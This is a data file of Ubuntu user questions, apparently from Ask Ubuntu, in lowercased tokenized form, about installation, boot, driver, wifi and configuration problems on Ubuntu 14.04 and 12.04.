522829	installing ubuntu 14.04 on z97x-gaming gt with nvidia geforce gtx 780ti card	how to install ubuntu 14.04 dual boot with windows 7 on a ssd , system is z97x-gaming gt with nvidia geforce gtx 780ti card and intel i7 4790k so far after getting throught install the machine restarts and i get purple outline with black center before it goes to black screen , i had to use nomodeset option in boot menu other wise i get black screen on install . windows 7 is on the ssd with unallocated space which using the installer i turned into one partition 75gb , primary , ext4 , mount point / one partition 34gb , logical swap area and put the boot loader on /dev/sdb ( as sda is a 3tb drive and i left it alone ) in frustration i tried just installing ubuntu using the erase disk and install ubuntu option in the installer , however this had the same issue as above
522830	enabling pae in ubuntu 12.04 on hp pavillon zt3000	i am unable to update ubuntu 12.04 to ubuntu 14.04 . i have an hp pavillon zt300 with intel centrino . please some indications ! ! fetched 2,609 kb in 13s ( 200 kb/s ) w : failed to fetch cdrom : //ubuntu 10.04.4 lts _lucid lynx_ - release i386 ( 20120214.2 ) /dists/lucid/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 10.04.4 lts _lucid lynx_ - release i386 ( 20120214.2 ) /dists/lucid/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/user/ppa-ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/user/ppa-raphik/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
522833	how to dump all dconf/gsettings so that i can compare them between two different machines ?	the problem : i have two machines , both with ubuntu gnome 14.04 up-to-date , and both with installed the latest crossover linux ( 1 ) to run ms office 2007 on it . i know , it 's a proprietary program , but the problem is more general and affect wine too . please do not stop reading . both machines have a spanish keyboard working well most of the time ( showing sometime a known bug but i think it 's unrelated ) . the problem is that on one of them there is a set of program running under crossover wine affected by a bug that makes the dead keys not working on some program , notably ms office word ( there is also another bug for another issue but it seems it is the same problem ) . disabling ibus in language support - > change keyboard input method and unsetting xmodifiers works on one machine but not on the other ( ! ) . so it must be some strange setting doing the difference ... the question is it possible to dump all the gsetting/dconf/whatever configuration database ( 2 ) in a readable file so that i can check differences with diff -u ? i know that gsettings list-recursively org.freedesktop.ibus.general works , but i am quite puzzled that gsettings list-recursively org.freedesktop gives the error no such schema 'org.freedesktop' ... so it seems that i ca n't dump all of the registry in one go . any hint ? footnotes : ( 1 ) this is a version of wine with added technical support and fixes to run some program better . a lot of the improvement percolates on free wine , so i think is a good part of the ubuntu ecosystem ; nevertheless i do not add the link to avoid being accused of publicity ; - ) ( 2 ) can we call it what it really is -- - a registry like the infamous windows one ?
522834	how to install opera 24 for ubuntu 12.04 ?	i installed opera browser ( version 12.16 ) on my ubuntu 12.04 , but i could n't find the turbo mode in it . so i am planning to install opera 24 developer version . can opera 24 developer be installed on ubuntu 12.04 ?
522836	boot-repair error on dual boot system with ubuntu 14.04 and windows 7	i have a laptop with both windows 7 and ubuntu 14.04 installed . both os were installed on uefi mode and are 64 bits . ubuntu 14 was installed using the upgrade option from ubuntu 13.10 . after the upgrade grub was broken and i could n't boot anymore . i managed to get windows to boot using the repair disc , but i ca n't get ubuntu to boot using grub . the first thing i tried then was using boot-repair , as i always did . but , somehow , with ubuntu 14 , boot-repair returns `` an error has ocurred '' and fails . i have the boot-repair log at http : //paste.ubuntu.com/8319294/ i hope this helps solving my problem as ubuntu is my main system . edit : i have a separate efi partition on my system . boot-repair gives an error `` wrong grub version detected . please report this message to boot.repair @ gmail.com '' edit : i tried following the tutorial from http : //superuser.com/questions/376470/how-to-reinstall-grub2-efi . only windows is booting , grub is being ignored .
522842	ubuntu 14.04 connect to a wifi network using command line	i have installed ubuntu 14.04 server and i need to connect to my wifi network . how can connect to wiki network only using command line .
522846	excessive temperature ?	i find my laptop very hot and i am a bit scared because my motherboard burned a couple of times recently , i had to send it to the repair shop to replace it ( but i can not be sure it was because of excessive temperature ) . like , right now the fans remain silent although the laptop seems very hot to me ( i only mean , when i touch it ) . however , when i type sensors , everything seems to be fine ( ? ) : acpitz-virtual-0 adapter : virtual device temp1 : +56.0°c ( crit = +149.8°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +56.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +55.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +56.0°c ( high = +86.0°c , crit = +100.0°c ) core 2 : +57.0°c ( high = +86.0°c , crit = +100.0°c ) core 3 : +55.0°c ( high = +86.0°c , crit = +100.0°c ) should i trust ubuntu ( or sensors ) that everything is fine and do nothing about the apparent excessive heat ? edit : i am asked legitimately to give details on my laptop and os : ubuntu 14.04 64bits 8 cores intel i7-2670qm cpu @ 2.20ghz ( but 4 physical processors i think ) 8g ram ssd 128go nvidia geforce gt 540m with the stupid optimus technology . i had forgotten about that actually , maybe the problem comes from here . but i use prime and everything seems to work fine ( i think i am using the `` intel '' card all the time ) .
522847	zte ax 226 modem is not connect on the ubuntu 14.04 lts	suddenly my bnglalion wimax modem ( zte ax226 ) is not working in ubuntu 14.04 lts . i updated ubuntu with this modem . in lsusb it 's recently showing vendor : product id as 198f : bccd , which was previously 198f:0220 . can anyone help me to change the configuration ( 198f : bccd to 198f:0220 ) ?
522848	ssd is more sluggish in unity than my hdd on 14.04	i 've been running ubuntu 14.04 on my old dell 6400 laptop with 2gb ram ( max ) with a small 60gb hdd and unity performance has been fine . last night i dropped in a 128gb adata sp600 ssd and installed 14.04 desktop ( 32 bit version ) . system boots up very fast , but unity ui performance slowed to 'molasses ' : windows fade in and out really slow and when i play video in vlc player from my usb drive , its really choppy . video played smooth and other wise just fine on the hdd . i 've re-installed 14.04 several times on the ssd and still get the sluggish responsiveness from the ui . i 'm going to try a my other ssds to see if its the drive , but am wondering if anyone has any suggestions ( like increasing swap size , etc. ) . was really surprised to see performance get worse with an ssd ! update # 1 /tmp and /var are both on /dev/sda1 both drives have a 2gb swap sudo hdparm -t /dev/sda test : ssd avg ( n=5 ) = 111.88 , hdd avg ( n=5 ) = 39.41 mb/sec variance was small between samples , so the ssd is roughly 3x faster the the hdd '' latest '' firmware on ssd is dated 2013-07-08 hdd is a 60gb 5400rmp seagate momentus . although ssd is pretty slow relative to the hdd , it is still roughly 3x faster . so hardware alone is probably not the reason the ssd is slower . next thing to try are the other optimizations . i 'm not very optimistic , but hope i 'm wrong . update # 2 cloned the adata ssd to my sandisk extreme and saw the same sluggish performance . next , i did these 9 optimizations : made sure i installed all the latest updates . installed non-free drivers using sudo apt-get install linux-firmware-nonfree bios and uefi : set it to ahci - no option in my bios to do this , so had to skip check for updated firmware - adata firmware update tool does n't work on windows 7 , so i 'm stuck with firmware that came with the drive . lesson : avoid adata drives if you 're running linux . swap : install sets to 2gb . recommendation was 7 % over-provisioning which would have been 9gb for the 128gb drive . tried 2 , 9 and 0 swap , but did n't see any difference in performance . ext 4 was set up by default : verified in gparted disabled the write action `` access time stamp '' by editing : /etc/fstab enabled automatic trim by editing : /etc/rc.local ran a manual trim executing : sudo fstrim -v / set vm.swappiness=1 in /etc/sysctl.conf reference : https : //sites.google.com/site/easylinuxtipsproject/ssd video was still choppy . @ ubuntu fanatic : yes , the laptop is older hw ( purchased 2006 ) running on the older sata bus and appears to be performing at expected speed . other articles suggest removing the swap , so i booted to a gparted live disk and removed the swap that the ubuntu installer created ( 2gb ) . did n't expect to see a performance improvement and did n't , but should improve life of the drive . @ mike jr/eric c. : i have integrated graphics on this ancient laptop . i 'll try xubuntu next , but for now , going back to the little spinner which was working just fine .
522852	permission denied : '/var/lib/partman/stopfifo ' when trying to install 14.04 as dual boot with windows 8	i am trying to install ubuntu 14.0.4.1 lts along with windows 8 to dual boot . i 've followed this question and done all the neccesary steps , installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) specs : thoshiba p75-a7100 came installed with windows 8 . i 've done this : uefi is enabled secure boot is disabled i am tryin to install ubuntu from a live cd . the installer gets stuck at prepare to install phase with below stack trace in debug . ( process:4250 ) : dconf-critical ** : unable to create file '/home/ubuntu/.cache/dconf/user ' : permission denied . dconf will not work properly . ( process:4250 ) : dconf-critical ** : unable to create file '/home/ubuntu/.cache/dconf/user ' : permission denied . dconf will not work properly . ( process:4250 ) : dconf-critical ** : unable to create file '/home/ubuntu/.cache/dconf/user ' : permission denied . dconf will not work properly . ( process:4250 ) : dconf-warning ** : failed to commit changes to dconf : could not connect : connection refused ( process:4263 ) : dconf-critical ** : unable to create file '/home/ubuntu/.cache/dconf/user ' : permission denied . dconf will not work properly . ( process:4263 ) : dconf-critical ** : unable to create file '/home/ubuntu/.cache/dconf/user ' : permission denied . dconf will not work properly . ( process:4263 ) : dconf-critical ** : unable to create file '/home/ubuntu/.cache/dconf/user ' : permission denied . dconf will not work properly . ( process:4263 ) : dconf-warning ** : failed to commit changes to dconf : could not connect : connection refused update_release_notes_label ( ) update_release_notes_label ( ) /usr/lib/ubiquity/ubiquity/frontend/gtk_components/nmwidgets.py:18 : warning : source id 512 was not found when attempting to remove it glib.source_remove ( self.timeout_id ) /usr/lib/ubiquity/ubiquity/frontend/gtk_components/nmwidgets.py:131 : warning : source id 578 was not found when attempting to remove it glib.source_remove ( self.rows_changed_id ) exception caught in process_line : traceback ( most recent call last ) : file `` /usr/lib/ubiquity/ubiquity/filteredcommand.py '' , line 145 , in process_line return self.dbfilter.process_line ( ) file `` /usr/lib/ubiquity/ubiquity/debconffilter.py '' , line 287 , in process_line if not input_widgets [ 0 ] .run ( priority , question ) : file `` /usr/lib/ubiquity/plugins/ubi-partman.py '' , line 2977 , in run size = int ( parted.partition_info ( p_id ) [ 2 ] ) file `` /usr/lib/ubiquity/ubiquity/parted_server.py '' , line 220 , in partition_info self.open_dialog ( 'partition_info ' , partition ) file `` /usr/lib/ubiquity/ubiquity/parted_server.py '' , line 141 , in open_dialog self.error_handler ( ) file `` /usr/lib/ubiquity/ubiquity/parted_server.py '' , line 112 , in error_handler exception_type = self.read_line ( ) [ 0 ] file `` /usr/lib/ubiquity/ubiquity/parted_server.py '' , line 74 , in read_line line = self.outf.readline ( ) .rstrip ( '\n ' ) file `` /usr/lib/python3.4/codecs.py '' , line 313 , in decode ( result , consumed ) = self._buffer_decode ( data , self.errors , final ) unicodedecodeerror : 'utf-8 ' codec ca n't decode byte 0xd5 in position 66 : invalid continuation byte exception ignored in : < bound method partedserver.__del__ of < ubiquity.parted_server.partedserver object at 0x7f86ed2fbf28 > > traceback ( most recent call last ) : file `` /usr/lib/ubiquity/ubiquity/parted_server.py '' , line 62 , in __del__ self.close_dialog ( ) file `` /usr/lib/ubiquity/ubiquity/parted_server.py '' , line 148 , in close_dialog self.sync_server ( ) ! [ enter image description here ] [ 1 ] file `` /usr/lib/ubiquity/ubiquity/parted_server.py '' , line 132 , in sync_server with open ( stopfifo , 'w ' ) : permissionerror : [ errno 13 ] permission denied : '/var/lib/partman/stopfifo'
522853	ubuntu 14 too high memory usage	i had browse for this issue in the forums , but the answers i found are not concrete or refers to older version of ubuntu . i am using ubuntu 14 ( 3.13.0-35-generic # 62-ubuntu x86_64 x86_64 x86_64 ) and the ram usage usually reach the 100 % . even with a just-booted system , it is more than 50 % . is this normal in this version of ubuntu ? for a 4 gb ram machine it would be better to switch to lubuntu or other desktop with less ram requirements ? $ free -h total used free shared buffers cached mem : 3.9g 2.3g 1.6g 23m 318m 1.0g -/+ buffers/cache : 1.0g 2.9g swap : 4,0g 0b 4,0g
522856	ntfs disk is read-only and i ca n't change to read & write	i have used windows 7 for a long time and thought to give linux ( ubuntu ) a try . i have two hard drives , one 120gb , other 1tb . first one is for os and software , while the 1tb disk is for data and games . so i installed ubuntu 14.04 on the 120gb disk ( sda ) and have done all those 10-things-you-should-do-after-installing-ubuntu . however , it did not want to mount the 1tb disk ( sdb ) at all saying that it 's corrupted , but after two restarts it mounted ( ... ? ) . i could access all my files but as a read-only disk . i installed gparted and got this message upon right-clicking /dev/sdb1 and selecting information : unable to read the contents of this file system ! because of this some operations may be unavailable . the cause might be a missing software package . the following list of software packages is required for ntfs file system support : ntfsprogs / ntfs-3g . since i 've been tackling this issue for about 5 hours now , i have heard and came across ntfsprogs and ntfs-3g but have only succeeded in installing ntfs-3g . ntfsprogs refuses to install for various reasons , e.g . command sudo apt-get install ntfsprogs returns reading package lists ... done building dependency tree reading state information ... done package ntfsprogs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ntfsprogs ' has no installation candidate what should i do ? how can i make it read & write ? it 's an ntfs file system , but it 's about 50 % full and i can not lose that data . is ntfs absolutely useless in ubuntu ( or linux generally ) ? please help
522864	anki software issue	hi i am no tech wizard so please no tech speak answers i have purchased a thai language course which uses the following link to download a memory training programme to help learn the language linux : http : //www.highspeedthai.com/anki/anki-1.0.1.tgz problem seems to be my version of ubuntu does seem to pick this up as installable software the link downloads a zip folder which you extract but from there i can not seem to get ubuntu to see it as a software programme this sort of negates the whole programme so i need this software to work any help really appreciated regards k
522865	audio stops after login	running 14.04lts - recent updates this morning audio chimes the default startup tones when bootup . all audio stops after login . if i use my prime login - all audio stops , audio controls disappear , nothing shows as listed in audio settings . did a few things from searching questions here - like remove and install pulseaudio - that did n't work as now most of my settings are missing . i have onboard audio with msi motherboard - works fine has for years . speakers work too , but i also have headphones - there seems to be no pulseaudio service i run spotify , banshee , and vlc if however , i log in as guest - audio services apear and audio works . what did i do wrong - should i just reinstall ?
522869	how to format entire hdd to it 's factory condition ?	i tried to install an image onto a secondary hdd but was n't able to make it work . now i want to wipe out everything on the hdd to it 's original factory condition so i can try again . i tried using gparted but it still shows 4 different empty partitions . any help on how i can bring it back to original factory condition is greatly appreciated : )
522870	how to see nerby people with empathy in ubuntu 14.04	the configuration of emphaty accounts in ubuntu 14.04 is substitued by the global `` online accounts '' configuration which ignores the empathy option to `` create '' an account just for the local network . so , how to configure empathy in ubuntu 14.04 in order to see the other users in the local network using empathy ?
522872	wifi not working and adapter for bluetooth not found	there is gui for bluetooth.but when i try to set-up new bluetooth device , it just pops up as no adapter found . also when i execute `` rfkill list all '' command it does n't show anything . hemanth @ 15n003tx : ~ $ rfkill list all hemanth @ 15n003tx : ~ $ help me to solve these problems
522873	show desktop does n't work with alt+tab in kubuntu	i am running kubuntu 14.04 to which i switched from ubuntu . i believe this has something to do with the problem . whenever i hit alt + tab to toggle through windows and applications , there 's supposed to be a thumbnail to show desktop . in my computer , this thumbnail is n't the right desktop , but it shows the one that i had set in ubuntu before i switched . if i happen to select it by mistake , it does show that screen , but it changes the background in all of my other desktop workspaces at once . if i go to the other workspaces , i do have the windows available , but the background will have been changed and i have to change it back one by one . i also noticed that this same background appears whenever i log out of my computer , as if it was set to be the overall background of my computer . would anyone know how to correct this ? thanks .
522879	problem with 14.04 : not booting	i successfully upgraded to 14.04 and worked for few days . suddenly the computer is not booting , it is showing : reboot and select proper boot device or insert boot media in selected boot device and press a key thereafter i created a start up disk creator from my other computer and ran on my desktop . however the computer screen is not progressing , and does not come to login window ...
522882	second monitor ( extended desktop ) flicks after upgrade to 14.04 lts desktop	i always connect the benq 22 '' monitor to my samsung rv511 laptop when using ubuntu 13.10 desktop version and its previous ones . the monitor is connected directly to my laptop 's video port , and works fine in extended desktop mode . after upgrade to 14.04 lts desktop version of ubuntu , the display of the external monitor is always flicking/jumping . it does not do so when the same monitor & . cable connects to my old windows vista laptop . so it looks to me that the issue is on the ubuntu video card driver side , that could be updated from 14.04 lts version . unfortunately i ca n't dig further due to lack of knowledge . could someone here give me a hand ? thanks in advance..
522883	how to center the login screen	although it is not a problem/issue . i do n't know where to put this question . is there anyway to bring the login screen [ password box ] at the middle of the screen . by default , it is at left of the screen but i want to bring it to the center of the screen . if anyone know , please help .
522886	enable webgl w/ intel drivers in chrome	my glxinfo : http : //pastebin.com/drbamaxn my lspci : http : //pastebin.com/rwsvfedu i 've enabled `` override software rendering '' in chrome : //flags , but chrome : //gpu still tells me 'webgl : unavailable ' . is this just a problem with my video card ?
522888	restore lost files	i have installed ubuntu , but i did n't know that all my files from d : partition will be deleted . they are deleted now as well as windows7 . my question is can i and how am i supposted to restore all my files from d : partition ? they are really important .
522890	vga temp goes high	i have installed graphical psensor software , on the tempt section which shows the degree of the vga it is normaly 70c and sometimes goes on 80c of temperature . lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] park [ mobility radeon hd 5430/5450/5470 ] i dont know that i have the proper driver and i am using ubuntu 12.04 and i dont have this problem with windows maybe the highest goes for 60 please help
522894	did i damage the system by shutting down after failed hibernation ?	i have an issue using ubuntu 14.04 on my desktop pc and mint 17 ( ubuntu based ) on my laptop . when i suspend or hibernate the two pc they do n't wake up , they only shows the blinking underscore without responding ( both pcs uses an amd cpu , i notice that this issue appears only with amd cpus ) , so i shut them down with pressing the power button . my question is : when i shut down the pc using the power button , did i damage the system ? both ubuntu and mint did n't give me any error , it seems that the whole system is regularly working . it 's only a curiosity .
522896	help install ubuntu w/o cd , dvd or usb	i am trying to install ubuntu 14.04 64-bit to my windows 7 32-bit pc . i have the iso , but i have no cd 's , usb sticks , or dvd . i 've tried unetbootin and wubi but that did n't work . so what do i do ?
522897	kill ubuntu 13.10 then install 14.04 fresh	i am fed up trying to upgrade to 14.04 i have tried everything i can find from ask and nothing is helping . can i just kill it and install 14.04 ? or uninstall completely than boot up with a 14.04 disk ? please dont make me go back to gates !
522898	wifi connects to modem but no internet . ubuntu 14.04.1	i am running ubuntu 14.04.1 on my hp pavillion 17 . i can connect to my router fine just get no internet connectivity . as soon as i plug in a ethernet cable all is fine *-network description : wireless interface product : rtl8188ee wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 01 serial : 0c:84 : dc:8e : dc:85 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8188ee driverversion=3.13.0-36-generic firmware=n/a ip=192.168.0.13 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 ioport:4000 ( size=256 ) memory : c2500000-c2503fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 07 serial : a0:48:1c:07 : c1:6c size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8106e-1_0.0.1 06/29/12 ip=192.168.0.8 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:3000 ( size=256 ) memory : c2404000-c2404fff memory : c2400000-c2403fff memory : afb00000-afb0ffff is the current readings . this has driven me bat shit crazy . any help would be greatly appreciated .
522900	ubuntu for lenovo a390 smart phone	kindly let me know , can i install ubuntu on lenovo a390 ? if possible what will be the steps ( link ) . best regards , prasanna rao
522901	gnome-session-flashback desktop -- is just booting into gnome enough or do i need to uninstall unity ?	i am currently running ubuntu 12.04 . if i want to run ubuntu with a less performance-sucking gui than unity , is it enough for me to install gnome-session-flashback desktop and set the system to boot into gnome , or must i also remove ubuntu desktop ? i assume the answer is 'yes ' ( for the non-pragmatist logicians out there i refer to the former clause , not the entire sentence ) , since the only desktop which affects performance is the one which is actually booted into , but i want to make sure since my understanding of the inner workings of these things is unfortunately a little poor . i have no space problems on the hdd , so i have no problem keeping unity as long as it does not get in the way of the performance of the system .
522902	problem with update ubuntu 14.04 dell vostro 3400	my problems is the next : i have installed ubuntu 14.04 in my laptop dell vostro 3400 , before the installation ubuntu did not start due to the nvidia video ( black screen ) , so i was reading on internet a i edited the start changing `` quiet splash '' for `` nomodeset '' , using that i can enter to ubuntu , when i am there i search for nvidia driver and installed , then i restart the system and everything is ok , the system start normally , but when i accept the ubuntu updates and ask me to restart the system , it does not work again , it blocks when the ubuntu symbol appear at the begining , i edit again the system start changing to nomodeset but i does work . i have reinstalled ubuntu twice but when i accept the updates that ubuntu suggest it does not work anymore . thanks for your help .
522903	`` gave up waiting for root device . alert ! /dev/disk/by-uuid/ does not exist . dropping to a shell '' while booting	i used ubuntu some years back and gave up on it . i am now ready to try again . to my surprise i was welcomed with this message as soon as i did the first install . if i waited some time and typed exit the os would boot normally . i decided to re-install ubuntu and see if that would do the trick . that was not the case . it keeps behaving the same way . attached is the image of the error . gave up waiting for root device . alert ! /dev/disk/by-uuid/11d3bcfa-0726-47cf-a705-e4acdd9169fe does not exist . dropping to a shell . any suggestions are appreciated ! sudo blkid ; mount ; cat /etc/fstab output : /dev/sda1 : label= '' system reserved '' uuid= '' 1c8cc0f68cc0cc08 '' type= '' ntfs '' /dev/sda2 : uuid= '' a490c32890c30032 '' type= '' ntfs '' /dev/sda5 : uuid= '' 920c6caa-4062-45f0-a58c-585db797d554 '' type= '' swap '' /dev/sda6 : uuid= '' 11d3bcfa-0726-47cf-a705-e4acdd9169fe '' type= '' ext4 '' /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=inti ) # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda6 during installation uuid=11d3bcfa-0726-47cf-a705-e4acdd9169fe / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=920c6caa-4062-45f0-a58c-585db797d554 none swap sw 0 0 hereâ´s the output of grep rootdelay /boot/grub/grub.cfg linux /boot/vmlinuz-3.13.0-32-generic root=uuid=11d3bcfa-0726-47cf- a705-e4acdd9169fe ro rootdelay=10 quiet splash $ vt_handoff linux /boot/vmlinuz-3.13.0-32-generic root=uuid=11d3bcfa-0726-47cf- a705-e4acdd9169fe ro rootdelay=10 quiet splash $ vt_handoff linux /boot/vmlinuz-3.13.0-32-generic root=uuid=11d3bcfa-0726-47cf- a705-e4acdd9169fe ro recovery nomodeset rootdelay=10
522905	unable to install ubuntu desktop 14.04 using cd	i 'm trying to install ubuntu 14.04 with a preseed file witch i 've included in the cd . i 've done this previously with ubuntu 12.04 using the alternate cd with no issues . the problem i have is that using the ubuntu 14.04 iso , the preseed file is being ignored and it boots to the graphic screen which lets you select to try or to install ubuntu . any ideas on this ? thanks in advance !
522906	connect usb modem on ubuntu 14.04	i am trying to connect my usb modem to the ubuntu 14.04 . initially , the connection was shown after reboot but now , if that has disappeared . i tried lot of things like creating script , installing gnome-ppp , but i am still unable to connect it . can anyone please suggest a solution ?
522908	wifi drivers not working on ubuntu 14.04	it shows the wifi connections but does n't connect . it asks for authentication every few seconds . the wifi card is bcm43142 802.11b/g/n . it 's written below `` this device is not working '' . shows no proprietary drivers are in use . an apt-get update gives errors were encountered while processing : firmware-b43-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the entire error : no chroot environment found . starting normal installation -- 2014-09-12 14:18:37 -- http : //www.lwfinger.com/b43-firmware/broadcom-wl-5.100.138.tar.bz2 resolving www.lwfinger.com ( www.lwfinger.com ) ... 173.254.28.119 connecting to www.lwfinger.com ( www.lwfinger.com ) |173.254.28.119|:80 ... connected . http request sent , awaiting response ... 200 please login . length : unspecified [ text/html ] saving to : ‘broadcom-wl-5.100.138.tar.bz2’ [ < = > ] 266 -- .-k/s in 0s 2014-09-12 14:18:37 ( 31.1 mb/s ) - ‘broadcom-wl-5.100.138.tar.bz2’ saved [ 266 ] bzip2 : ( stdin ) is not a bzip2 file . tar : child returned status 2 tar : error is not recoverable : exiting now dpkg : error processing package firmware-b43-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : firmware-b43-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
522909	can not install libreplan due to missing dependencies !	i am trying to install libreplan onto my ubuntu pc , but it keeps telling me that i am missing loads of dependencies . when i try to install the dependencies using sudo apt-get install cutycapt , it tells me : e : package 'cutycapt ' has no installation candidate these are the dependencies that libreplan wants me to install : the following packages have unmet dependencies . libreplan : depends : cutycapt but it is not installable depends : postgresql but it is not installable depends : postgresql-client but it is not installable depends : xvfb but it is not installable depends : dbconfig-common but it is not installable depends : tomcat6 but it is not installable depends : default-jre-headless but it is not installable or default-jre but it is not installable depends : libpg-java but it is not installable e : unable to correct problems , you have held broken packages .
522911	how to show gnome power preferences in xubuntu 14.04 ?	i installed gnome-power-manager and removed xfce4-power-manager in my netbook . but the power preferences is not showing in the xubuntu control center . i want to show this config application : how can i show it ? ( gnome-power-preferences is not exist in trusty ) . thanks in advance !
522915	diconnected you are now offline	i have been using ubuntu for about two weeks now . originally i got the message disconnected : you are now offline showing just an outline of the wireless icon . a wired connection works fine however . at that point i reinstalled ubuntu as it was early days , but now it 's happened again and i ca n't find a fix anywhere .
522917	ca n't see windows 8.1 boot login after boot repair ubuntu	this is my http : //paste.ubuntu.com/8320907/ i ca n't see my windows 8.1 anymore . i want to dual boot windows 8.1 and ubuntu , but now after boot repair somehow i ca n't log in to my windows 8.1 .
522918	how do i report an ubuntu software center `` listing '' problem ?	how do you report a possible security risk to users in ubuntu software center ? there is two game apps in the ubuntu software center called `` karts '' and `` kart 1000 ... '' both : - listed as free - but the listing is setup to use the `` buy '' button , which leads people to purchase through ubuntu one . - dev site link ( in that listing ) goes to a free generic webpage , which seems like a `` front '' ( false page for phishing ) .. all the links there go to areas that would not be related in any way to a game vendor . in reality , all links lead to a service to creating webpages and selling extras to do suchwith that service . - support link ( in that listing ) goes to that same page . -licensing is not listed as being something that is a valid licensing type . listed as `` proprietary '' ... so how to report to whom -- for someone to investigate as a either a `` scam '' and possibly get removed . or ... if they are real products , that are on the level , then the listings need to be corrected , to not be misleading . we need to protect our users right ?
522919	how do i play just one song in rhythmbox ?	in windows media player , when i right click one song and then click play , it plays just one song ( it does n't advance to the next track when song finishes ) , and when i double click a song , it plays the next songs in list when the first song has finished . how do i play just one song in rhythmbox ?
522920	unable to getpwuid : no such file or directory	i 've been fighting against linux for about 3 hours now . so after rebooting normally a couple of hours ago , my ubuntu did n't boot and sticked with a cursor blink . so i noticed i was full of ext4 errors and decided to go into recovery mode . did n't boot . so i opened a bash with init=/bin/bash and fscked my disk , and rebooted in recovery mode . now , my linux says unable to getpwuid : no such file or directory . it says it 3 times in multiple occasions , first is friendly pre start process , second friendly post start process ... so well ... i 'm trying to find a solution but ca n't find anything . peace .
522923	vnc from mac to ubuntu - a few questions	i just got an ubuntu desktop 14.04 up and running in my basement meant to be serving media files and feeding my projector . from my living room i would like to use the screen sharing application on osx but for some reason it 's not allowing me to connect . why ? i believe i tried all possible combinations . so i 've installed a bunch of vnc servers and clients now and all that really kinda works is x11vnc as server : x11vnc -ncache -display :0 -auth /var/run/lightdm/root/:0 -forever where i connect via 'chicken of the vnc ' or 'realvnc ' . but why is it that i have to use 3rd party client software and why is it that when connecting using one of the two apps , that i get no less than 9 screens . that 's right , 9 screens , slowing down my screen 0 which , after all , is there . should i use some other server ? the sharing option from the ubuntu desktop is not much help here . hope someone can shed some light on this and optimize the experience . thanks !
522925	how do i release software on apt-get ?	i 'm a bit new to desktop programming , and i currently prefer to work with scripting languages ( open source and all ) . when i polish a tool off i then want to release it for installation via apt-get but i have not found any guides or information whatsoever on how to release software on apt-get . i understand that distributing the files to install can be done via a personal launchpad ppa , with the overhead of manually adding my ppa via apt-add-repository ( though i have not experienced this step , i just presume my understand is sound ) ; though i 'm more interested in the next steps . do i need to fill an application to get onto apt-get 's default lists or what ? appreciate your help < 3
522927	keyboard & mouse input failure after updating 14.04	everything was working great yesterday . i did the latest update for 14.04 last night and now my keyboard and mouse are not working . i have a dual boot environment windows7 and ubuntu 14.04 . the problem is i ca n't even enter into the recovery environment to attempt a repair , as the keyboard is not recognised even at the grub screen stage of launch . so i can not make a selection i just have to wait for it to load ubuntu 14.04 but once launched the keyboard and mouse are dead so can not do anything further . i have tried multiple reboots and swapping usb ports and keyboard mouse combinations but none work . i have even booted from my live cd and reinstalled grub 2 from terminal and using gui grub reinstaller . oh and the mouse & keyboard work fine when i boot from the live cd so it is not a hardware issue . any ideas how i should solve this would be greatly appreciated .
522929	how do i hide these folders	how do i hide a folder with a name like this : why productive people get up insanely early fast company business + innovation_files i download web pages complete and end up with two listings for each , the html file and the one above . i 've now got two listings for each one .
